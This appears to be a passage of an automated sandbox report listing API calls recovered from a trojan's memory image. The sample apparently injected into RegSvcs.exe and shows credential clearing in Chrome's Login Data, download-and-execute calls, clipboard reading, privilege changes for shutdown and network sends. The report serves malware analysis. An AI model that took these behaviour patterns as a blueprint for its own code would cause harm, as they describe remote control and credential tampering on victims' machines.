                                • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                              • GetProcAddress.KERNEL32(00000000), ref: 00416872
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                              • String ID: !D@$PowrProf.dll$SetSuspendState
                              • API String ID: 1589313981-2876530381
                              • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                              • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                              • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                              • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                              • GetLastError.KERNEL32 ref: 0040BA58
                              Strings
                              • UserProfile, xrefs: 0040BA1E
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                              • [Chrome StoredLogins not found], xrefs: 0040BA72
                              • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 2018770650-1062637481
                              • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                              • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                              • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                              • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                              • GetLastError.KERNEL32 ref: 0041799D
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                              • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                              • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                              • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                              APIs
                              • __EH_prolog.LIBCMT ref: 00409258
                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                              • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                              • FindClose.KERNEL32(00000000), ref: 004093C1
                                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                              • FindClose.KERNEL32(00000000), ref: 004095B9
                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                              • String ID:
                              • API String ID: 1824512719-0
                              • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                              • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                              • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                              • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ManagerStart
                              • String ID:
                              • API String ID: 276877138-0
                              • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                              • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                              • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                              • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                              APIs
                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 004524D5
                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004524FE
                              • GetACP.KERNEL32 ref: 00452513
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: ACP$OCP
                              • API String ID: 2299586839-711371036
                              • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                              • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                              • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                              • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                              APIs
                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                              • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                              • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                              • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Resource$FindLoadLockSizeof
                              • String ID: SETTINGS
                              • API String ID: 3473537107-594951305
                              • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                              • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                              • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                              • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                              APIs
                              • __EH_prolog.LIBCMT ref: 0040966A
                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstH_prologNext
                              • String ID:
                              • API String ID: 1157919129-0
                              • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                              • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                              • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                              • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                              APIs
                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                              • GetUserDefaultLCID.KERNEL32 ref: 0045271C
                              • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                              • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004527ED
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                              • String ID:
                              • API String ID: 745075371-0
                              • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                              • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                              • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                              • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                              APIs
                              • __EH_prolog.LIBCMT ref: 00408811
                              • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                              • String ID:
                              • API String ID: 1771804793-0
                              • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                              • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                              • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                              • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DownloadExecuteFileShell
                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$open
                              • API String ID: 2825088817-1832597450
                              • Opcode ID: 3e962aae1bf6d9a082c2cb8e7c72c1813a0f1391a4c7d5151776bd2fdf264440
                              • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                              • Opcode Fuzzy Hash: 3e962aae1bf6d9a082c2cb8e7c72c1813a0f1391a4c7d5151776bd2fdf264440
                              • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$FirstNextsend
                              • String ID: XPG$XPG
                              • API String ID: 4113138495-1962359302
                              • Opcode ID: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                              • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                              • Opcode Fuzzy Hash: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                              • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                              APIs
                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                • Part of subcall function 0041376F: RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                • Part of subcall function 0041376F: RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateInfoParametersSystemValue
                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                              • API String ID: 4127273184-3576401099
                              • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                              • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                              • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                              • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                              APIs
                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • IsValidCodePage.KERNEL32(00000000), ref: 00451DBA
                              • _wcschr.LIBVCRUNTIME ref: 00451E4A
                              • _wcschr.LIBVCRUNTIME ref: 00451E58
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451EFB
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                              • String ID:
                              • API String ID: 4212172061-0
                              • Opcode ID: d51387d99b1e6b249aff8f61d3989bee7608b3a62aead1fc41d833bb042b57a0
                              • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                              • Opcode Fuzzy Hash: d51387d99b1e6b249aff8f61d3989bee7608b3a62aead1fc41d833bb042b57a0
                              • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                              APIs
                              • _free.LIBCMT ref: 004493BD
                                • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                              • GetTimeZoneInformation.KERNEL32 ref: 004493CF
                              • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 00449447
                              • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 00449474
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                              • String ID:
                              • API String ID: 806657224-0
                              • Opcode ID: 633092c3bba77b0065560d4fdbd9d9f897920caf7f9bf618c5d01735725c6ecb
                              • Instruction ID: 1863d2ad967fb4723a60e4ea427cb143a9fbff6035582c54e6546b9b7662ab80
                              • Opcode Fuzzy Hash: 633092c3bba77b0065560d4fdbd9d9f897920caf7f9bf618c5d01735725c6ecb
                              • Instruction Fuzzy Hash: E1312570908201EFDB18DF69DE8086EBBB8FF0572071442AFE054973A1D3748D42DB18
                              APIs
                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorInfoLastLocale$_free$_abort
                              • String ID:
                              • API String ID: 2829624132-0
                              • Opcode ID: efce462eab54bf8eb2a2b6f9a4d43eb8e53eecd25de09d2246b00390d92e3d5e
                              • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                              • Opcode Fuzzy Hash: efce462eab54bf8eb2a2b6f9a4d43eb8e53eecd25de09d2246b00390d92e3d5e
                              • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                              • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                              • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                              • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                              • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                              • ExitProcess.KERNEL32 ref: 004432EF
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                              • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                              • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                              • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                              APIs
                              • OpenClipboard.USER32(00000000), ref: 0040B711
                              • GetClipboardData.USER32(0000000D), ref: 0040B71D
                              • CloseClipboard.USER32 ref: 0040B725
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$CloseDataOpen
                              • String ID:
                              • API String ID: 2058664381-0
                              • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                              • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                              • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                              • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                              APIs
                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: GetLocaleInfoEx
                              • API String ID: 2299586839-2904428671
                              • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                              • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                              • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                              • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$FreeProcess
                              • String ID:
                              • API String ID: 3859560861-0
                              • Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                              • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                              • Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                              • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                              • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                              • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                              • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                              APIs
